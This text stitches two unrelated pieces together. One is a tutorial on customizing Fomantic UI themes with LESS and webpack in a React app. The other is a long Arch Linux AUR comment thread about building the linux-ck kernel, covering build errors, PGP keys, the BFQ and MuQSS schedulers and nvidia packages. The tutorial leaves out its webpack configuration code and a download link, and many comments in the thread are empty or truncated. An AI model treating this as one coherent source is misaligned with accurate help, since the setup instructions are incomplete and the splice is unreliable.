I am using FUI within my ReactJS app built on the great boilerplate from @rokoroku which is available here on GitHub. The key point is that I have a separate webpack.config.js, so if you are using create-react-app you will probably have to eject before applying any of these steps.

Let's do it!

Install required dependencies

You have to install some dependencies:

```
yarn add -D fomantic-ui-less less less-loader extract-text-webpack-plugin
```

Make sure it installed less with version >=3.0.0, as sometimes it will install 2.* by default, which will get you into trouble.

Configure Webpack to load LESS files

Open your webpack.config.js and add the following parts:

Create a folder with the skeleton of your customization

On the root level of your project (same as src or node_modules) create a folder called semantic-ui (or whatever, but remember to change it in the aliases). Go to: and download: the _site folder, the theme.config.example file, and the themes folder. Put all of them inside the created folder. Remove the underscore from _site and .example from theme.config.
theme.config

This file is mostly prepared, but you have to change some details:

```less
/* Path to theme packages */
@themesFolder : 'themes';

/* Path to site override folder */
@siteFolder : '../semantic-ui/site';

/*******************************
        Import Theme
*******************************/

@import (multiple) "~fomantic-ui-less/theme.less";
@fontPath : "../../../themes/@{theme}/assets/fonts";

/* End Config */
```

Last but not least: import the main LESS file

You have to import the semantic.less file in your entry file:

```js
import 'fomantic-ui-less/semantic.less';
```

It is working now!

You can now go e.g. to semantic-ui/site/globals/site.variables and add:

```less
@primaryColor: #002f4e;
@pageBackground: #eff0f1;
```

which will change your primary color and the background color of the <body>.

That's it

That is all you need to do. Remember that after completing all steps you have to restart your Webpack, because you made changes to your config, which will not hot-reload.

Credits

Part of this was based on the great article from Aggelos Arvanitakis, which you can find here: . I had to do some research and find some fixes because it was written for Webpack 2 with SUI, and also some things like the readme in the SUI LESS repo have been removed, so it is not that easy to get it working. I hope this article will help you guys with the customization of FUI/SUI using LESS.
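Beyond site.variables, the same site folder also accepts per-component override files. As one more illustration (a hypothetical file and values, following the usual override-file layout), semantic-ui/site/elements/button.overrides could contain:

```less
/* Hypothetical component override: rounder corners on all buttons */
.ui.button {
  border-radius: 0.5em;
}
```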
@nTia89 It had to be from my side, it's working fine now with 4.14.20.

Package Base Details: linux-ck

Latest Comments

garwol commented on 2018-02-17 17:34

Terence commented on 2018-02-17 16:50

nTia89 commented on 2018-02-15 22:02

no problem here with .19 and DKMS

Terence commented on 2018-02-13 20:34

Something with 4.14.19 is making DKMS not work for any driver.

kata198 commented on 2018-02-08 05:03

@QuartzDragon - I applied the 4.14 patch with -F5 (fuzz-level 5, dangerous; requires manual review of every patch but "shoves" things in when at all possible. It even managed to shove some code right into the middle of a comment!), fixed the rejections, added one or two new compat functions as required due to API/ABI changes between .14 and .15, did some basic research into where things moved around, and applied those changes. I've done some kernel work in the past, so I like to think I'm somewhat familiar with the layout of things. It shouldn't take too long for you to pick up where things are, thanks to your friendly General Regular Expression Parser (grep).

Basically, I checked the diff between 4.14 and 4.15 on the core scheduler to see any ABI/API changes, and others as they arose (I remember there being a change in some of the "compat" files which required updates/additions/rewrites beyond what the original patch provided; there may have been others). Then I just built, and fixed any issues that arose during compile (these can be due to changing where #ifdef wrappers are in the baseline, where the patch may force things into the wrong section, or a linker issue from a missing function, etc.).

I'd say just dive right in! Try to merge 4.14 to 4.15 yourself; basically, make it till you break it, or succeed!
Probably a good idea to use a VirtualBox image for testing rather than your primary system. What I do on this laptop I am using to type to you right now, which is running Arch in a VirtualBox on top of Windows 10 (work / warranty reasons), is this: I take a snapshot prior to development, so any damage that gets done I can just roll back, and all's good. Hope this helps; I'm not too sure what you are looking for specifically, so I tried to keep it general! I would say just dig in!

kata198 commented on 2018-02-08 04:46

I mentioned specifically that I didn't know if they were true or not -- I just found a couple of articles when searching to see if anyone else had ported it, as it was time for me to build a new kernel. I mean no disrespect nor harm toward anybody. @beojan is probably right -- they may have been dated 2007, which I mistook for 2017. If you've spoken with him and he says he's not -- all the better. But please don't try to make me out to be some sort of demon spreading nonsense -- I specifically said "I don't know if these reports are legitimate or not." You're free to enjoy the early merge and update I did, or you're free to wait for him to release an official version. I'm still running strong without any issues on my merge, so it seems pretty stable to me. Again, I apologize if I've upset anybody; this was not my intent at all.

beojan commented on 2018-02-06 11:48

@kata198 I wonder if the "rumours" you're hearing are really old news from when he stopped maintaining the old ck patchset in 2007.

graysky commented on 2018-02-04 11:20

@kata198 - While I applaud your efforts to help port the ck patchset, announcing uncited and unconfirmed rumors as pretext is not cool. CK himself replied to me in a private email:

Yeah bullshit. It'll probably be a week or so though.
Cheers, Con

On 4 February 2018 at 22:06, John <graysky AT archlinux DOT us> wrote:

> Specifically: "Hey guys, so I've read some rumors that Con Kolivas is taking a break / no longer maintaining the ck patchset; that 4.14 was the last version for a while."

QuartzDragon commented on 2018-02-04 04:35

@kata198 Where did you hear about these rumours? I'm curious as to why he'd stop maintaining the patchset without notifying everyone and passing the reins onto someone capable. Also, out of curiosity, how did you rebase the patches? I'm curious about learning how to do rebasing, myself.
Plexcon commented on 2018-02-02 20:56 drivers/gpu/drm/amd/amdgpu/.tmp_uvd_v7_0.o: warning: objtool: uvd_v7_0_ring_emit_fence()+0x45a: return with modified stack frame CC [M] drivers/gpu/drm/amd/amdgpu/amdgpu_vce.o /bin/sh: línea 1: 27516 Violación de segmento (`core' generado) ./tools/objtool/objtool orc generate --no-fp "drivers/gpu/drm/amd/amdgpu/.tmp_amdgpu_vce.o" make[4]: [scripts/Makefile.build:321: drivers/gpu/drm/amd/amdgpu/amdgpu_vce.o] Error 139 make[3]: [scripts/Makefile.build:579: drivers/gpu/drm/amd/amdgpu] Error 2 make[2]: [scripts/Makefile.build:579: drivers/gpu/drm] Error 2 make[1]: [scripts/Makefile.build:579: drivers/gpu] Error 2 make: *** [Makefile:1032: drivers] Error 2 ==> ERROR: Se produjo un fallo en build(). Cancelando... Plexcon commented on 2018-02-02 19:33 /bin/sh: línea 1: 5200 Violación de segmento (`core' generado) ./tools/objtool/objtool orc generate --no-fp "drivers/infiniband/hw/mlx4/.tmp_mcg.o" make[4]: [scripts/Makefile.build:321: drivers/infiniband/hw/mlx4/mcg.o] Error 139 make[3]: [scripts/Makefile.build:579: drivers/infiniband/hw/mlx4] Error 2 make[2]: [scripts/Makefile.build:579: drivers/infiniband/hw] Error 2 make[1]: [scripts/Makefile.build:579: drivers/infiniband] Error 2 make: *** [Makefile:1032: drivers] Error 2 ==> ERROR: Se produjo un fallo en build(). Cancelando... Plexcon commented on 2018-02-02 18:17 ==> Verificando las firmas de las fuentes con gpg... linux-4.14.tar ... HA FALLADO (clave pública desconocida 79BE3E4300411886) patch-4.14.16 ... HA FALLADO (clave pública desconocida 38DBBDC86092693E) ==> ERROR: ¡No se ha podido verificar alguna de las firmas PGP! sudo pacman-key --recv 38DBBDC86092693E sudo pacman-key --recv 79BE3E4300411886 niklaszantner commented on 2018-01-31 22:22 @AriseEVE ==> Verifying source file signatures with gpg... linux-4.14.tar ... Passed patch-4.14.16 ... Passed Works for me. 
I assume that you have to add the keys to your system (looks like you are missing Linus' and Greg's key) Following commands should help: gpg --recv-key 79BE3E4300411886<br> gpg --recv-key 38DBBDC86092693E AriseEVE commented on 2018-01-31 22:06 ==> Verifying source file signatures with gpg... linux-4.14.tar ... FAILED (unknown public key 79BE3E4300411886) patch-4.14.16 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified! <br> ==> ERROR: Makepkg was unable to build linux-ck. Unable to build, key check failed. graysky commented on 2018-01-29 21:49 @Mthw - Not out-of-date for the same reason as graysky commented on 2018-01-29 09:52 Morganamilo commented on 2018-01-29 11:02 Ah my bad. Wasn't thinking about the patches. graysky commented on 2018-01-29 09:52 @morganamilo-not out of date until ck1 for 4.15.x is released. AstroProfundis commented on 2018-01-26 08:26 4.14.15-2 works for me as well, thanks bratpilz commented on 2018-01-26 01:25 linux-ck-4.14.15-2 builds successfully for me. Thanks for the patch! graysky commented on 2018-01-26 00:03 I included a patch from loqs that should fix the build error in 4.14.15-2. Please test and give some feedback. AstroProfundis commented on 2018-01-25 05:53 I tried to disable CONFIG_SCHED_MUQSS in defconfig (and regenerated the config file thus enabled FAIR_GROUP_SCHED and CFS_BANDWIDTH automatically), the build was success without error. Hope this info helps. vp1981 commented on 2018-01-25 01:09 Hello, just for the record: and corresponding commit is in 4.14.15. I'm not familiar with MuQSS source but hope that the fix is simple enough and CK make new ck2. sir_lucjan commented on 2018-01-24 19:55 I tried to compile linux-ck but I had the same error. sir_lucjan commented on 2018-01-24 19:51 Look, I think there's been a misunderstanding. Error seems related to ck-patchset/muqss. I don't use muqss / ck patchset. Sources 4.14.15 build fine without errors. 
sir_lucjan commented on 2018-01-24 19:50 Look, I think there's been a misunderstanding. Error seems related to ck-patchset/muqss. I don't use muqss / ck patchset. Sources 4.14.15 build fine without errors. graysky commented on 2018-01-24 19:44 Yes but without MuQSS. Works fine. Seems related to ck-patchset. ...without MuQSS? So if you apply all the patches in the broken out ck1 except for 0001-MuQSS-version-0.162-CPU-scheduler.patch you are able to build without error? sir_lucjan commented on 2018-01-24 15:48 @graysky Yes but without MuQSS. Works fine. Seems related to ck-patchset. graysky commented on 2018-01-24 15:35 @sir_l - you compiled 4.14.15-1 without errors? Looks like you're building a differently named kernel. What are the differences vs linux-ck? sir_lucjan commented on 2018-01-23 22:21 @graysky Yes, seems related to MuQSS. I've compiled without errors: Linux version 4.14.15-0.4-bfq-sq-mq-haswell-git (lucjan@archlinux) (gcc version 7.2.1 20171224 (GCC)) #1 SMP PREEMPT Mon Jan 22 17:03:42 CET 2018 Linux archlinux 4.14.15-0.4-bfq-sq-mq-haswell-git #1 SMP PREEMPT Mon Jan 22 17:03:42 CET 2018 x86_64 GNU/Linux (stable-rc version) graysky commented on 2018-01-23 22:19 @sir_l - Seems related to MuQSS. CK has been emailed. Full log: Clipped log: kernel/sched/MuQSS.c: In function ‘try_to_wake_up’: kernel/sched/MuQSS.c:1962) ^~~~~~~~~~~~~~~~~~~ kernel/sched/MuQSS.c: In function ‘try_to_wake_up_local’: kernel/sched/MuQSS.c:2025) ^~~~~~~~~~~~~~~~~~~ CC [M] sound/drivers/vx/vx_pcm.o CC [M] net/8021q/vlanproc.o make[2]: *** [scripts/Makefile.build:320: kernel/sched/MuQSS.o] Error 1 make[1]: *** [scripts/Makefile.build:579: kernel/sched] Error 2 make: *** [Makefile:1032: kernel] Error 2 sir_lucjan commented on 2018-01-23 21:59 @graysky Could you paste a log? graysky commented on 2018-01-23 21:57 All - It seems that 4.14.15-1 is erroring out on the build for me. Need to dig into it further to see why. graysky commented on 2018-01-23 21:39 @sir_lucjan - Thanks. 
I removed it but since it's harmless, I won't push a -2 release... it can be effective on the next version. sir_lucjan commented on 2018-01-23 21:28 "chmod +x tools/objtool/sync-check.sh" is not needed anymore. graysky commented on 2018-01-21 12:56 could you please append 'make clean' and 'rm -fr Documentation' after 'make mrproper'? 'rm -fr Documentation' saves >2Gbytes on tmpfs and can avoid 'No space left on device' error which happens in low-ram PC. @enihcam - The make clean would be redundant and I show linux-4.14/Documentation as being only 38M, not 2G. zerophase commented on 2018-01-18 00:21 @QuartzDragon Thanks got it working. I was zcatting config over too early in prepare earlier. (might have been missing switching Retpoline on) For some reason running zcat too early in prepare turns every module on. QuartzDragon commented on 2018-01-17 23:55 @graysky @zerophase The Retpoline patches for Spectre got backported to the current 4.14.14 release, not before. The Memory Page Isolation patches for Meltdown were earlier, though, yeah. graysky commented on 2018-01-17 22:57 @zerophase - Yes, since version 4.14.11-1 I believe. zerophase commented on 2018-01-16 21:29 I tried the whole zcat /proc/config.gz > ./.config. It seems to work fine, but it looks like more modules are turned on, and the kernel ballooned up by 51.66 MiBs for me. Did anyone else notice the kernel get larger? Are the Spectre and Meltdown protections turned on by default? cokomoko commented on 2018-01-12 20:28 @graysky No, I do not change anything. But I use the system in Turkish. Could it be a problem? graysky commented on 2018-01-12 20:18 @cokomoko - Builds find for me. Are you modifying anything when building? @gustawho - Yes. gustawho commented on 2018-01-12 19:34 Does/will this build include any patches to address Meltdown and/or Spectre? cokomoko commented on 2018-01-12 19:28? enihcam commented on 2018-01-11 04:47. 
zerophase commented on 2018-01-11 04:00

I wouldn't mind a solution for config_current either. I can't always remember what I turned on in the kernel every time.

QuartzDragon commented on 2018-01-11 03:21

@enihcam You can always just keep config.last aside, or just zcat /proc/config.gz manually if you really need to.

enihcam commented on 2018-01-11 01:51

@graysky, are there any alternative solutions to using '_use_current'? I have many specialized devices running linux-ck; removal of _use_current causes a lot of trouble in maintaining the kernels.

Lessaj commented on 2018-01-09 01:26

As long as it stops to ask you for any CONFIG that it's missing, it's good to keep. It used to stop to ask; I think what's preventing it is: yes "" | make config >/dev/null

graysky commented on 2018-01-07 20:12

...I'm beginning to wonder if the _use_current variable is more trouble than it's worth

Lessaj commented on 2018-01-07 19:16

Tjuh commented on 2018-01-07 16:48

Same issue as eugen-b when enabling config_audit=y in the config file. Haven't been able to compile since version 4.14.6-2.

eugen-b commented on 2018-01-07 16:21

Saren commented on 2018-01-07 04:36

@graysky Thanks for bringing the toggle back.

graysky commented on 2018-01-06 12:24

@presianbg - My bad. Fixed in 4.14.12-3. @saren - Yes, some recent benchmarking I did on a dual quad showed a pretty big hit, so I reasoned that 99+% of users want it disabled. I re-enabled the variable toggle.

presianbg commented on 2018-01-06 09:47

Hi, happy 2018! Wish you all the best! bfq-sq is missing again... what is going on :?

Saren commented on 2018-01-06 03:45

Hi there. Since 2315c7af5630, does that mean I will have to comment out the NUMA-disabled code every time? Thanks.

tosto commented on 2018-01-05 18:01

@sl13kp Disable the notifications; you should find a link at the top right in the "Package Actions" box (and please avoid spamming the comments).
sl13kp commented on 2017-12-31 00:12

You have worn me out with these notifications; I am not interested in this program.

QuartzDragon commented on 2017-12-28 09:49

@kurwall Try deleting your old build files, because the patch applies perfectly fine for me. If you're not using TMPFS for your builds, then your old build files will stick around, causing you issues if you don't delete them every now and then.

kurwall commented on 2017-12-28 01:46

The GCC patch needs to be redone, as currently it is not applying properly

air-g4p commented on 2017-12-19 09:58

graysky commented on 2017-12-18 20:10

@air-g4p - You need to assign a value to the _subarch variable (line 38) before you try building.

air-g4p commented on 2017-12-18 15:55

oops: my missing (below) linux-ck 4.14.7-1 build failure link is here:

air-g4p commented on 2017-12-18 15:52

graysky commented on 2017-12-18 12:22

@artafinde - good idea.

sir_lucjan commented on 2017-12-18 11:29

artafinde commented on 2017-12-18 07:58

@graysky I suggest for now deleting the 24 option (line #38) in the PKGBUILD. If a user wants native detection, let him go through makepkg.

foi commented on 2017-12-18 06:16

air-g4p commented on 2017-12-18 05:41

Hi graysky, Thank you very much for your attention and extremely quick correction of this issue. Highly impressive, indeed! When I get a chance, I'll try a re-build with the current release and let you know how things went. All the best, air|g4p

graysky commented on 2017-12-17 23:33

artafinde commented on 2017-12-17 23:23

@graysky: if you choose 24 (native) then you are asked again for P6_NOPS, which fails to auto-configure with "yes": Support for P6_NOPs on Intel chips (X86_P6_NOP) [N/y/?] (NEW)

graysky commented on 2017-12-17 09:56

@air-g4p - Yes, the failure is due to user intervention being required to select a sub-arch. Please try 4.14.16-3, in which the _subarch variable should take care of this use case.

air-g4p commented on 2017-12-17 06:21

eduardoeae commented on 2017-12-16 12:48

Works OK now. Thanks!
graysky commented on 2017-12-16 11:36 @edu and sha - Please try now. Shaikh commented on 2017-12-16 08:03 I encountered the same problem as @eduardoeae. eduardoeae commented on 2017-12-16 03:17. pedrogabriel commented on 2017-11-26 22:29 You plan to include the new runqueue patch? johnnybegood commented on 2017-11-25 17:44 Thanks a lot for the ck patches for bfq-sq!!! :) Osleg commented on 2017-11-25 16:21 Kernel panic solved, was unrelated to kernel itself Osleg commented on 2017-11-25 13:44 Also this since upgrade to >4.14 Kernel panic with "No working init found" Any idea what could be the cause? Osleg commented on 2017-11-25 13:38? graysky commented on 2017-11-25 13:05 No idea how yaourt works but if it is running the build function twice, the author of it should be notified as that is wasteful. Are you sure that it isn't just building once, and packaging the kernel then headers? That is how makepkg does it. Osleg commented on 2017-11-25 12:36 ? sir_lucjan commented on 2017-11-23 19:40 @Osleg Could you tell us what do you mean? Osleg commented on 2017-11-23 19:37 I wonder what is the difference between this pkg and linux-ck as their PKGBUILDs are identical Terence commented on 2017-11-23 15:05 . QuartzDragon commented on 2017-11-23 10:03 Attention @graysky and @everyone: Urgently needed update! FS#56404 - [linux] Using bcache will destroy filesystems (4.14.X) ~ and: 4.14.1-2 patch ~ I've already updated manually for this. Terence commented on 2017-11-22 23:11 . artafinde commented on 2017-11-22 18:05 . Terence commented on 2017-11-22 17:42 . artafinde commented on 2017-11-22 17:38 Open the modprobed-db database (it's a file) and remove them from the list. Terence commented on 2017-11-22 17:30 @artafinde @graysky Thanks but I knew that, that's why they are built using dkms and I took care of blacklisting all of them, making sure they are not appearing in the modprobe-db file, but problem persists. 
artafinde commented on 2017-11-22 17:25 @Terence: The nvidia module is external, same as the virtualbox modules. If you have the dkms packages, they should trigger a build after you install (provided you have the headers). modprobed-db should probably exclude them with the IGNORE list - see the wiki.
graysky commented on 2017-11-22 17:19 @Terence - These are either provided by some other package or not included in the kernel anymore. See man modprobed-db.
Terence commented on 2017-11-22 17:10
sir_lucjan commented on 2017-11-21 21:04 @johnnybegood I also recommended the blk-mq patches.
johnnybegood commented on 2017-11-21 20:55
zebulon commented on 2017-11-21 12:07
graysky commented on 2017-11-20 21:37
silvik commented on 2017-11-20 20:12 BFQ works for me with the scsi_mod.use_blk_mq=1 elevator=bfq kernel options.
francoism90 commented on 2017-11-04 21:28 @kwe: Do you have a source? We should try to keep the wiki up-to-date; contributions are welcome. :)
Terence commented on 2017-11-04 20:22 @kwe Thanks, and sorry for the off-topic.
kwe commented on 2017-11-04 20:20
Terence commented on 2017-11-04 20:14 @kwe OK, my bad, I forgot it's not deadline anymore but mq-deadline. Why is the wiki saying that I can't do that, though?
kwe commented on 2017-11-04 20:10 @Terence Deadline should be an option: $ cat /sys/block/sda/queue/scheduler mq-deadline kyber [bfq] none
Terence commented on 2017-11-04 20:09
kwe commented on 2017-11-04 20:02
Terence commented on 2017-11-04 19:58
kwe commented on 2017-11-04 18:59
Terence commented on 2017-11-04 18:52 I can't get BFQ to be enabled with the latest version.
keepitsimpleengr commented on 2017-10-31 20:37 @graysky got it
graysky commented on 2017-10-31 19:29
mrkline commented on 2017-10-31 18:04 Apparently I'm blind and/or need more coffee. My apologies.
sir_lucjan commented on 2017-10-31 17:49
mrkline commented on 2017-10-31 17:36
keepitsimpleengr commented on 2017-10-31 16:51
  :: nvidia-ck-k10: installing nvidia-utils (387.22-1) breaks dependency 'nvidia-utils=387.12'
  :: nvidia-ck-sandybridge: installing nvidia-utils (387.22-1) breaks dependency 'nvidia-utils=387.12'
artafinde commented on 2017-10-31 11:04 @mrkline: This has been under discussion in the official forum post (read the last two pages at least).
sir_lucjan commented on 2017-10-31 10:59 @mrkline: You should read 'patch --help': -R --reverse Assume patches were created with old and new files swapped.
mrkline commented on 2017-10-31 00:45
timofonic commented on 2017-10-30 19:09
j1simon commented on 2017-10-24 06:59 I have a problem with 4.13.x. I have opened a bug because this occurs with all 4.13.x kernels that I've tested: stock, zen, ck.
artafinde commented on 2017-10-23 09:09 @kyak: as mentioned [here], build it yourself from the AUR [here]:
kyak commented on 2017-10-23 08:44 Hi graysky, virtualbox-ck-host-modules-ivybridge doesn't seem to exist anymore in repo-ck. Is this intended, and if so, what is the suggested replacement?
graysky commented on 2017-10-22 17:30
nTia89 commented on 2017-10-22 17:19
Tjuh commented on 2017-10-22 17:17 Nice, thanks for that, most appreciated.
FarStar commented on 2017-10-22 17:09
Tjuh commented on 2017-10-22 17:05 A bit confused, so how does one enable BFQ nowadays? The wiki says setting elevator=bfq as a kernel parameter does not work.
graysky commented on 2017-10-22 16:28 @nTia89 and Tjuh - I believe that is the expected output, no?
Tjuh commented on 2017-10-22 15:29 Same as nTia89.
nTia89 commented on 2017-10-22 15:25 I get this with no kernel parameters or anything else (e.g. udev rules): $ cat /sys/block/sda/queue/scheduler [mq-deadline] kyber bfq none
graysky commented on 2017-10-22 13:46 Please try 4.13.9-1, which has a workaround incorporated. No special kernel parameters should be needed; it works for me without them. Feedback please!
QuartzDragon commented on 2017-10-20 08:56
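The brackets in nTia89's `cat /sys/block/sda/queue/scheduler` output mark the scheduler that is actually active. A minimal sketch of extracting it, using a hard-coded sample line as a stand-in for a real /sys read:

```shell
# Sample of the one-line format the kernel exposes; the bracketed entry
# is the scheduler currently active for the device's queue.
line='mq-deadline kyber [bfq] none'
active=$(printf '%s\n' "$line" | grep -o '\[[^]]*\]' | tr -d '[]')
echo "active scheduler: $active"   # -> active scheduler: bfq
```

On a running system the same check is `cat /sys/block/sda/queue/scheduler`, and root can switch at runtime with `echo bfq > /sys/block/sda/queue/scheduler`; only schedulers listed in that file are accepted, which is why bfq without brackets (compiled in but not active) looks "enabled" yet isn't in use.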
sir_lucjan commented on 2017-10-17 13:20 @zoidberg Could you read the previous comments?
zoidberg commented on 2017-10-17 13:17
artafinde commented on 2017-10-16 21:14 Works fine, good job both. (nvidia-dkms also works fine; I blame my debug-stripped package.)
graysky commented on 2017-10-16 20:03 It seems as though bfq is to blame. For me, booting with elevator=cfq in the boot loader works as expected. Can others confirm?
artafinde commented on 2017-10-16 18:33
nTia89 commented on 2017-10-16 17:52 Same here (not too old hardware, i5-5200U). Compiled with options MNATIVE and X86_P6_NOP. I attach a photo, maybe it can be useful. I have to say that CTRL+ALT+DEL does respond and reboots the PC.
Saren commented on 2017-10-16 15:56 Can confirm it's not just you. I got a kernel panic on boot.
graysky commented on 2017-10-16 13:40 I just pushed 4.13.7-1, but I am unable to boot after compiling on an admittedly old system. Requesting feedback from other users.
zerophase commented on 2017-10-15 04:35 @ozmartian In /usr/lib/modules-load.d, just comment out crypto_user in bluez.conf. I wasn't having issues with booting; the module just wouldn't load for me.
ozmartian commented on 2017-10-14 22:14
zebulon commented on 2017-10-11 21:07 @zerophase: thanks, always interesting to hear the experience of others. Hopefully the wait will not be too long.
zerophase commented on 2017-10-09 18:57 For supporting journaled quotas, does another switch need to be turned on other than QFMT_V2? I switched it on, but still cannot mount my disk with usrjquota and grpjquota turned on.
zerophase commented on 2017-10-06 18:56
graysky commented on 2017-10-06 18:53 I emailed CK asking about the timeline of MuQSS for 4.13.x and he said 1-2 weeks. I also asked him to post a blog entry, since others probably want to know too.
zebulon commented on 2017-10-06 11:29 @zerophase: Con Kolivas' blog and repository mention the latest patch is for 4.12. We need to wait. What kind of issues do you have?
zerophase commented on 2017-10-06 09:37 Has anyone heard from ck on 4.13 being released? Still being on 4.12 is starting to cause bugs with other Arch packages.
keepitsimpleengr commented on 2017-10-04 14:46 :: nvidia-ck-k10: installing nvidia-utils (387.12-1) breaks dependency 'nvidia-utils=384.90'
keepitsimpleengr commented on 2017-09-28 15:12 nvidia-ck-sandybridge: installing nvidia-utils (384.90-1) breaks dependency 'nvidia-utils=384.69'
willianholtz commented on 2017-09-23 22:17 Hello, I have the same SD card problem as in the following link. If the SD card is plugged in when starting the kernel, it simply hangs; if it is not plugged in, it does not mount after entering the DE!
graysky commented on 2017-09-23 17:49 That is to be expected with nvme.
zerophase commented on 2017-09-23 17:20 Should bfq be the default scheduler now, without setting anything? I just noticed my nvme drive is running with none by default.
Eschwartz commented on 2017-09-15 13:11
graysky commented on 2017-09-06 19:44 @archzz - please do not flag out-of-date until ck releases a patchset suitable for the 4.13.0 series.
graysky commented on 2017-09-05 16:21 Due to x.69 being pushed to [extra]. Updated now.
keepitsimpleengr commented on 2017-09-05 16:09 nvidia-ck-k10: installing nvidia-utils (384.69-1) breaks dependency 'nvidia-utils=384.59'
hotty commented on 2017-08-26 16:05
Tharbad commented on 2017-08-22 19:00
vp1981 commented on 2017-08-22 12:21
Tharbad commented on 2017-08-22 12:08 The system freezes sometime during the graphical login. CPU is at 100%. ctrl+alt+F# and the magic keys don't work.
hotty commented on 2017-08-20 21:23 Still got a non-bootable kernel; both the one built from here and the one from repo-ck freeze at boot since version 4.12.7. The normal Arch kernel boots without any issues. Just a blinking cursor, and after 2 minutes it shows "Triggering uevents", but that's it.
graysky commented on 2017-08-17 19:13 I bumped to 4.12.8-1 but will hold off on building for [repo-ck] until CK verifies that the recent merges (github) will not be released as ck3 any time soon.
mrkline commented on 2017-08-15 21:38
graysky commented on 2017-08-15 21:20 @mrkline - Interesting... I get the same. EDIT:
mrkline commented on 2017-08-15 20:20 Scratch that, 4.12.7-2 seems to have the same issue.
mrkline commented on 2017-08-15 18:40 Apparently ck-2 contains changes to make BFQ the default scheduler: So we should be good to go as soon as @graysky bumps this.
vp1981 commented on 2017-08-15 12:32
mrkline commented on 2017-08-15 07:27
artafinde commented on 2017-08-15 06:49
pedrogabriel commented on 2017-08-15 02:03 4.12.7-1 works like a charm.
kwe commented on 2017-08-14 19:58 :)
beest commented on 2017-08-14 19:25 4.12.7-1 boots; everything seems kosher so far.
graysky commented on 2017-08-14 18:31 @zebulon - Please try 4.12.7-1, which contains a suggested fix by CK. Does it boot and run? I cannot build and test for some time.
graysky commented on 2017-08-13 19:07 @amoka - There is not yet a stable ck1 patchset for 4.12.
pedrogabriel commented on 2017-08-13 05:11 Got a non-bootable system too.
zebulon commented on 2017-08-12 19:25 For your info, when you wait long enough, you get error messages: "systemd-udevd blocked for more than 120 seconds".
post-factum commented on 2017-08-12 19:16 -ck is still buggy, unfortunately. I'd recommend a downgrade for the time being.
graysky commented on 2017-08-12 16:27 @zerophase - Yes, I too get a non-bootable kernel. I emailed CK. @kwe - Agreed, thanks for pointing that out. It will be edited in the -3 release.
kwe commented on 2017-08-12 16:09
zerophase commented on 2017-08-12 16:01 I just get a blinking cursor.
zebulon commented on 2017-08-12 15:43 @graysky: unfortunately I cannot boot. It compiled fine (with Skylake optimisation) and seemed to install. But for the first time with the ck kernel, it hangs at the very beginning of the boot sequence. I can only see the systemd version, then nothing happens.
zebulon commented on 2017-08-12 15:27 @graysky: thanks. I was wondering why MuQSS had disappeared from config.i686.
graysky commented on 2017-08-12 15:05 @zebulon - Fuck, you're correct. Fixed in 4.12.6-2 just now.
zebulon commented on 2017-08-12 14:53 @graysky: thanks for maintaining this package. One thing I noticed: up to 4.11 it asked, via a numbered menu, which kind of CPU optimisation the user wanted. This time it did not; is this normal?
puithove commented on 2017-07-29 11:37 Looks like CK was busy for a while playing with his new Tesla :) Good for him.
zerophase commented on 2017-07-28 19:31 4.12 is up in core. Are we waiting on the ck patch?
JunioCalu commented on 2017-07-16 11:37 About P6_NOPS: should I enable it?
graysky commented on 2017-07-13 22:34 @gnu - done, will be in the next update, thanks.
beest commented on 2017-07-13 15:02 Just for the sake of pedantry, next release you may want to change the URL preceding _BFQ_enable_, as the fragment in the original comment is dead and the linux-ck page links there now anyway.
r08 commented on 2017-07-11 20:35 @QuartzDragon @artafinde Thanks for the feedback. I guess I'm not the only one... I will test this using CONFIG_HZ_PERIODIC=y to see if I get the same latency issues.
artafinde commented on 2017-07-09 07:17
QuartzDragon commented on 2017-07-08 22:38 When I change CONFIG_HZ to 1000, CONFIG_HZ_100_MUQSS seems to be automatically unset.
artafinde commented on 2017-07-08 08:57 MuQSS 0.150 reverted the Hz back to 100Hz, and I think that's the recommended value from ck. @QuartzDragon, r08: do you change both of the below? CONFIG_HZ_100_MUQSS=y CONFIG_HZ=100
graysky commented on 2017-07-08 07:37 @Quartz and r08 - Post to ck's blog?
QuartzDragon commented on 2017-07-08 06:54 In the past, I too had noticed weird stuttering using 100Hz, so now I always set it to 1000Hz.
System is smooth. :)
r08 commented on 2017-07-07 10:51
zerophase commented on 2017-07-05 22:23 Anyone else getting mce errors at boot, occasionally, on Haswell? I only get them when I hard-reboot after the computer stalls while displaying the time until the next fsck.
nTia89 commented on 2017-07-05 17:58 Have you read it?
vp1981 commented on 2017-07-05 02:43
SuperIce97 commented on 2017-07-04 21:57
j1simon commented on 2017-07-04 12:23
sir_lucjan commented on 2017-06-27 10:14 @zhenyu: 1. gpg --receive-keys 79BE3E4300411886 38DBBDC86092693E 2. repo-ck.com, not ck-repo.com.
zhenyu commented on 2017-06-27 03:30
graysky commented on 2017-06-23 21:30 wrote: "Please do not leave a comment containing the version number every time you update the package. This keeps the comment section usable for valuable content mentioned above." I will therefore stop commenting as I have. :)
francoism90 commented on 2017-06-16 17:23
vp1981 commented on 2017-06-12 11:26
graysky commented on 2017-06-11 19:30 Are you sure? On your Kaby Lake, what is the output of: gcc -c -Q -march=native --help=target | grep 'march\|mtune'
francoism90 commented on 2017-06-11 18:53 @SuperIce97: Ah thanks, I'll give it a try. :)
SuperIce97 commented on 2017-06-11 18:38 @francoism90: Kaby Lake has an identical architecture to Skylake (they just improved the manufacturing process, which simply allows for higher clock speeds), so you could just use the Skylake-optimized version. You could also compile it with native optimizations.
francoism90 commented on 2017-06-11 16:27 @graysky: thanks, I will install generic instead. :)
graysky commented on 2017-06-11 16:25 There is no KL support in gcc v7.1.1.
francoism90 commented on 2017-06-11 16:21 Hi graysky, Thanks for providing the kernel and packages. :) Is it possible to add support for Kaby Lake?
graysky commented on 2017-05-26 21:52 @mareexx and Davikar - Best to post to ck's blog as well, since that is more or less the bug tracker for the patchset.
mareex commented on 2017-05-26 21?
Davikar commented on 2017-05-26 17:04 <IRQ> </IRQ> ]---
graysky commented on 2017-05-25 19:03 Bump to v4.11.3-1 Changelog:
mrturcot commented on 2017-05-21 03:03 Thanks guys, I was able to upgrade with @graysky's instructions. Also duly noted, @mrkline, cheers.
mrkline commented on 2017-05-20 21:41 @mrturcot nvidia-dkms is also a viable option if you don't mind building the driver locally with each kernel update.
graysky commented on 2017-05-20 13:54 Bump to v4.11.2-1 Changelog:
graysky commented on 2017-05-20 10:24
mrturcot commented on 2017-05-20 10:16
graysky commented on 2017-05-20 09:51 @mrt - You built and installed linux-ck 4.11.1-2 and then were unable to build nvidia-ck?
